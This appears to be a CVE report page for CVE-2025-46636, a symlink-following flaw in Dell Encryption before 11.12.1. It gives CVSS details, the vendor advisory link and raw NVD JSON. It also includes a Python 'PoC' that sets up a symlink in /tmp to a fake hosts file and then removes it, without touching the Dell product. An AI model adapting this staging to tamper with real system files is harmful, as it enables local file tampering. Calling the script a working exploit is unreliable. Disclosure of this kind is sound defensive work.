Security Vulnerability Report
CVE-2025-46636 CVSS 6.6 MEDIUM

Published: 2025-12-09 18:15:52
Last Modified: 2025-12-10 17:07:54

Description

Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:encryption:*:*:*:*:*:*:*:* - VULNERABLE
Dell Encryption < 11.12.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46636 PoC - Symbolic Link Following in Dell Encryption
# This PoC demonstrates the symbolic link following vulnerability
# Note: This is for educational and authorized testing purposes only
#
# The script only stages the precondition (a world-writable symlink in /tmp
# pointing at an attacker-controlled file) and then removes it again; it does
# not itself interact with Dell Encryption.

import os


def create_symlink_poc():
    """
    Demonstrates the symbolic link following vulnerability in
    Dell Encryption versions prior to 11.12.1
    """
    target_file = "/etc/hosts"  # Target for demonstration
    fake_target = "/tmp/fake_hosts_backup"
    link_path = "/tmp/dell_encryption_temp_link"

    print("CVE-2025-46636 Symbolic Link Following PoC")
    print("=" * 50)
    print(f"Target: {target_file}")
    print(f"Fake target: {fake_target}")
    print(f"Malicious symlink: {link_path}")
    print()

    # Create fake target file with malicious content
    with open(fake_target, 'w') as f:
        f.write("# Modified by CVE-2025-46636 exploit\n")
        f.write("127.0.0.1 localhost\n")
        f.write("# Malicious entry added\n")
    print(f"[+] Created fake target file: {fake_target}")

    # Remove existing symlink if present. os.path.lexists() is used rather
    # than os.path.exists() so that a dangling symlink left over from an
    # earlier run is detected and removed instead of making os.symlink() fail.
    if os.path.lexists(link_path):
        os.remove(link_path)

    # Create symbolic link pointing to fake target
    try:
        os.symlink(fake_target, link_path)
        print(f"[+] Created malicious symlink: {link_path} -> {fake_target}")
    except OSError as e:
        print(f"[-] Failed to create symlink: {e}")
        return False

    print("\n[!] Vulnerability Condition:")
    print("    When Dell Encryption processes files,")
    print("    it may follow this symlink and access the fake target")
    print("    instead of the intended file, leading to information tampering.")

    # Cleanup: remove the link first so the target file is never reached
    # through it, then remove the target itself.
    print("\n[*] Cleaning up test files...")
    if os.path.lexists(link_path):
        os.remove(link_path)
    if os.path.exists(fake_target):
        os.remove(fake_target)
    print("[+] Cleanup complete")
    return True


if __name__ == "__main__":
    print("WARNING: This PoC is for authorized security testing only!")
    print()
    create_symlink_poc()

References

https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442 (Vendor Advisory, DSA-2025-442)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-46636",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T18:15:52.033",
    "lastModified": "2025-12-10T17:07:53.850",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 6.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-59"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:dell:encryption:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "11.12.1",
                "matchCriteriaId": "98044DEC-A30E-416F-AFDA-37151C304748"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}